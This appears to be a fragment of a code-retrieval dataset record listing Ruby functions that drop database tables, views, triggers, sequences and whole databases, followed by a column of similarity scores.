"def drop_database(db_name)\n check_return_code(PureHailDB.ib_database_drop(db_name))\n end",
"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_table(klass)\n # Remove leftover data from some join tabkes.\n klass.relations.each do |rel|\n if rel.class.to_s == \"Og::JoinsMany\" and rel.join_table\n target_class = rel.target_class\n exec \"DELETE FROM #{rel.join_table}\"\n end\n end\n exec \"DROP TABLE #{klass.table}\"\n end",
"def drop_table(*names)\n names.each {|n| execute(drop_table_sql(n))}\n end",
"def drop_view_sql(name, opts=OPTS)\n \"DROP #{'MATERIALIZED ' if opts[:materialized]}VIEW#{' IF EXISTS' if opts[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_movies_table\n c = connect\n c.exec \"DROP TABLE IF EXISTS movies;\" \n c.close\nend",
"def drop_sql\n raise NotImplementedError, \"DatabaseSymbol should not be instanciated\"\n end",
"def truncate_db\n drop_table\n create_table\n end",
"def drop_view_sql(name, options)\n \"DROP VIEW#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def drop_sequence(sequence_name, options = {})\n SchemaMonkey::Middleware::Migration::DropSequence.start(connection: self, sequence_name: sequence_name, sequence_options: options) do |env|\n sequence_name = env.sequence_name\n options = env.sequence_options\n sql = \"DROP SEQUENCE\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(sequence_name)}\"\n execute sql\n end\n end",
"def drop_table(table_name = temporary_table_name)\n ::RailsRedshiftReplicator.connection.exec \"drop table if exists #{table_name}\"\n end",
"def drop_table(table_name, **options)\n schema_cache.clear_data_source_cache!(table_name.to_s)\n execute \"DROP#{' TEMPORARY' if options[:temporary]} TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_table_name(table_name)}#{' CASCADE' if options[:force] == :cascade}\"\n end",
"def destroy_schema\n Apartment::Tenant.drop tenant\n end",
"def destroy_schema\n Apartment::Tenant.drop tenant\n end",
"def drop\n ensure_service!\n service.drop_database instance_id, database_id\n true\n end",
"def drop\n ensure_service!\n service.drop_database instance_id, database_id\n true\n end",
"def to_maql_drop\n maql = \"\"\n [ attributes, facts ].each do |obj|\n maql += obj.to_maql_drop\n end\n maql += \"DROP {#{self.identifier}};\\n\"\n end",
"def drop\n @db.drop_collection(@name)\n end",
"def migrate!\n @logger.fine('Dropping schema...')\n\n migrate(0) # migrate to version 0.\n migrate # migrate to latest version.\n end",
"def clean_schema\n # AppControl.restart_server # if Rails.env.production?\n ActiveRecord::Base.connection.schema_cache.clear!\n end",
"def down\n \tdrop_table :solution_submissions\n\n # \texecute <<-SQL\n # \t\tDROP TYPE s_status;\n # \tSQL\n\n # \texecute <<-SQL\n # \t\tDROP TYPE lang;\n # \tSQL\n\n end",
"def delete_kiosks\n @db.execute(\"DROP TABLE Kiosks\")\n end",
"def reset\n tables = MODELS + [ENV['SCHEMA_TABLE']]\n tables.each { |t|\n DB << \"DROP TABLE IF EXISTS #{t.inspect};\"\n }\nend",
"def db_destroy_postgresql(*args)\n\n\t\t\tcmd_db_disconnect()\n\n\t\t\treturn if ! db_find_tools(%W{dropdb})\n\n\t\t\tinfo = db_parse_db_uri_postgresql(args[0])\n\t\t\targv = []\n\n\t\t\tif (info[:user])\n\t\t\t\targv.push('-U')\n\t\t\t\targv.push(info[:user])\n\t\t\tend\n\n\t\t\tif (info[:pass])\n\t\t\t\tprint()\n\t\t\t\tprint_status(\"Warning: You will need to enter the password at the prompts below\")\n\t\t\t\tprint()\n\t\t\t\targv.push('-W')\n\t\t\tend\n\n\t\t\tif (info[:host])\n\t\t\t\targv.push('-h')\n\t\t\t\targv.push(info[:host])\n\t\t\tend\n\n\t\t\tif (info[:port])\n\t\t\t\targv.push('-p')\n\t\t\t\targv.push(info[:port])\n\t\t\tend\n\n\t\t\tcargs = argv.map{|c| \"'#{c}' \"}.join\n\t\t\tsystem(\"dropdb #{cargs} #{info[:name]}\")\n\t\tend",
"def drop_database\n puts \"Droping database #{@db_name}...\"\n begin\n client = Mysql2::Client.new(:host => @db_host, :username => @db_user, :password => @db_pass)\n client.query(\"DROP DATABASE IF EXISTS #{@db_name}\")\n client.close\n rescue Exception => e\n puts \"An error occurred\\n #{e}\"\n end\n end",
"def uninstall_on(db, options = {})\n buffer, sql = \"\", \"\"\n all_objects_in_order.reverse.each{|o| \n sql = o.to_clean_sql(db)\n (buffer << sql << \";\\n\") unless sql.nil? or sql.empty?\n }\n execute_ddl(db, buffer, options)\n db\n end",
"def drop_database\n options = { database: Orientdb::ORM.connection_uri.database, user: Orientdb::ORM.connection_uri.user, password: Orientdb::ORM.connection_uri.password }\n Orientdb::ORM.with { |conn| conn.client.delete_database( options ) }\nend",
"def drop_index_sql(table, op)\n \"DROP INDEX #{quote_identifier(op[:name] || default_index_name(table, op[:columns]))} ON #{quote_schema_table(table)}\"\n end",
"def drop\n @db.drop_collection(@name)\n end",
"def drop(database = \"\", user=\"\", password=\"\")\n if (user.empty?)\n user = @user\n end\n if (password.empty?)\n password = @password\n end\n if (database.empty?)\n database = @database\n end\n check_params(user,password,database)\n\n cmd = \"mysql --user=#{user} --password=#{password} -e 'drop database #{database};' #{database}\"\n # puts \"cmd = \" + cmd\n system cmd\n end",
"def db_destroy_mysql(*args)\n\n\t\t\tcmd_db_disconnect()\n\n\t\t\treturn if ! db_find_tools(%W{mysqladmin})\n\n\t\t\tinfo = db_parse_db_uri_mysql(args[0])\n\t\t\targv = []\n\n\t\t\tif (info[:user])\n\t\t\t\targv.push('-u')\n\t\t\t\targv.push(info[:user])\n\t\t\tend\n\n\t\t\tif (info[:pass])\n\t\t\t\targv.push('--password=' + info[:pass])\n\t\t\tend\n\n\t\t\tif (info[:host])\n\t\t\t\targv.push('-h')\n\t\t\t\targv.push(info[:host])\n\t\t\tend\n\n\t\t\tif (info[:port])\n\t\t\t\targv.push('-P')\n\t\t\t\targv.push(info[:port])\n\t\t\tend\n\n\t\t\targv.push(\"-f\")\n\n\t\t\tcargs = argv.map{|c| \"'#{c}' \"}.join\n\t\t\tsystem(\"mysqladmin -f #{cargs} drop #{info[:name]}\")\n\t\tend",
"def drop_trigger(table_name, trigger_name, options = {})\n SchemaMonkey::Middleware::Migration::CreateTrigger.start(connection: self, table_name: table_name, trigger_name: trigger_name, options: options) do |env|\n table_name = env.table_name\n trigger_name = env.trigger_name\n options = env.options\n\n sql = \"DROP TRIGGER\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(trigger_name)} ON #{quote_table_name(table_name)}\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def drop_function_sql(name, opts=OPTS)\n \"DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_language_sql(name, opts=OPTS)\n \"DROP LANGUAGE#{' IF EXISTS' if opts[:if_exists]} #{name}#{' CASCADE' if opts[:cascade]}\"\n end",
"def uninstall_on!(db, options = {})\n sql = \"\"\n all_objects_in_order.reverse.each{|o| \n begin\n sql = o.to_clean_sql(db)\n execute_ddl(db, sql, options)\n rescue Sequel::Error => ex\n puts \"Ignoring: #{ex.message}\" if options[:verbose]\n end\n }\n db\n end",
"def drop_sequence(name)\n execute drop_sequence_sql(name)\n end",
"def drop_sequence(name)\n self.execute(\"DROP TABLE IF EXISTS %s_sequence\" % name)\n end",
"def drop\n database.command(:drop => name)\n rescue Error::OperationFailure => ex\n raise ex unless ex.message =~ /ns not found/\n false\n end",
"def down\n execute <<-SQL\n DROP TABLE event_registrations;\n SQL\n\n execute <<-SQL\n DROP TABLE members;\n SQL\n\n execute <<-SQL\n DROP TABLE events;\n SQL\n\n execute <<-SQL\n DROP TABLE treatment_logs;\n SQL\n\n execute <<-SQL\n DROP TABLE feeding_logs;\n SQL\n\n execute <<-SQL\n DROP TABLE employees;\n SQL\n\n execute <<-SQL\n DROP TABLE animals;\n SQL\n\n execute <<-SQL\n DROP TABLE tanks;\n SQL\n\n execute <<-SQL\n DROP TABLE habitats;\n SQL\n end",
"def destroy\n @schema.destroy\n respond_to do |format|\n format.html { redirect_to schemas_url, notice: 'Schema was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @schema.destroy\n respond_to do |format|\n format.html { redirect_to schemas_url, notice: 'Schema was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @schema.destroy\n respond_to do |format|\n format.html { redirect_to schemas_url, notice: 'Schema was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n [METADATA_TABLE_NAME, RUN_HISTORY_TABLE_NAME,\n DISABLED_MONITOR_TABLE_NAME, MONITOR_INFO_TABLE_NAME].each do |table|\n @db.execute(\"DROP TABLE IF EXISTS #{table}\")\n end\n\n create()\n end",
"def drop_table(table)\n connection.drop_collection(database,table)\n end",
"def destroy\n @schema_table.destroy\n respond_to do |format|\n format.html { redirect_to schema_tables_url, notice: 'Schema table was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy_constraints_statement(table_name, constraint_name)\n <<-EOS.compress_lines\n ALTER TABLE #{quote_table_name(table_name)}\n DROP CONSTRAINT #{quote_constraint_name(constraint_name)}\n EOS\n end",
"def prepare_db_for_restore\n raise \"restore unimplemented for #{adapter}\" unless (adapter = @db_conf[:adapter]) == 'postgresql'\n query = \"SELECT table_name FROM information_schema.tables WHERE table_schema='public' AND table_type='BASE TABLE'\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n tables = `#{cmd}`\n\n query = \"DROP TABLE #{tables.map(&:chomp).map(&:strip).reject(&:empty?).join(\", \")} CASCADE\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n `#{cmd}`\n end",
"def destroy\n @schema = Schema.find(params[:id])\n @schema.destroy\n\n respond_to do |format|\n format.html { redirect_to schemas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @schema = Schema.find(params[:id])\n @schema.destroy\n\n respond_to do |format|\n format.html { redirect_to schemas_url }\n format.json { head :no_content }\n end\n end",
"def drop_table(tablename)\r\n raise(ArgumentError, 'Table name must be a symbol!') unless \\\r\n tablename.is_a?(Symbol)\r\n raise \"Table does not exist!\" unless table_exists?(tablename)\r\n @table_hash.delete(tablename)\r\n\r\n return @engine.delete_table(tablename)\r\n end",
"def remove_tables_from_publication(name, tables)\n typed_exec(\"ALTER PUBLICATION #{connection.quote_ident(name)} DROP TABLE #{safe_list(tables)}\")\n end",
"def drop_db( path_names )\n path_name_tokens = path_names.split( \"|\" )\n zone = path_name_tokens[1]\n connect_for( zone ) do |con|\n db_name = path_name_tokens.pop\n con.drop_database( db_name )\n end\n end",
"def drop(environment: :development)\n db = config(environment: environment).fetch(\"database\")\n File.delete(db) if File.exist?(db)\n end"
] |
[
"0.8680619",
"0.85794634",
"0.85016835",
"0.84340376",
"0.8426357",
"0.829404",
"0.82850105",
"0.8108252",
"0.80193865",
"0.8011835",
"0.77801085",
"0.74915457",
"0.7473172",
"0.746467",
"0.74538666",
"0.7438913",
"0.7438811",
"0.73444384",
"0.73317754",
"0.7308943",
"0.7280758",
"0.7271184",
"0.714929",
"0.7064724",
"0.7055206",
"0.6999474",
"0.6913484",
"0.6907225",
"0.6897807",
"0.68721247",
"0.68402153",
"0.68003166",
"0.67787707",
"0.67613256",
"0.6747003",
"0.6736786",
"0.67274463",
"0.6699812",
"0.6661077",
"0.6646018",
"0.6557036",
"0.65480155",
"0.65236425",
"0.6489998",
"0.64857954",
"0.6483834",
"0.64651453",
"0.6454189",
"0.6453989",
"0.6431793",
"0.6414508",
"0.6380541",
"0.63698435",
"0.6344371",
"0.63368136",
"0.63310134",
"0.6312857",
"0.63037103",
"0.6303456",
"0.6303147",
"0.6303147",
"0.62534547",
"0.62534547",
"0.62500036",
"0.6245522",
"0.6239918",
"0.6235864",
"0.6227832",
"0.61864",
"0.6172624",
"0.61584526",
"0.6143514",
"0.6141624",
"0.61408865",
"0.6113451",
"0.6111409",
"0.60908175",
"0.6072674",
"0.6069633",
"0.6063831",
"0.6049968",
"0.6043502",
"0.6042274",
"0.6026672",
"0.6025028",
"0.59750646",
"0.5961822",
"0.5961822",
"0.5961822",
"0.59566844",
"0.59426826",
"0.5941483",
"0.5936925",
"0.5928614",
"0.5924562",
"0.5924562",
"0.59092814",
"0.58980876",
"0.58869904",
"0.5864218"
] |
0.86468154
|
1
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.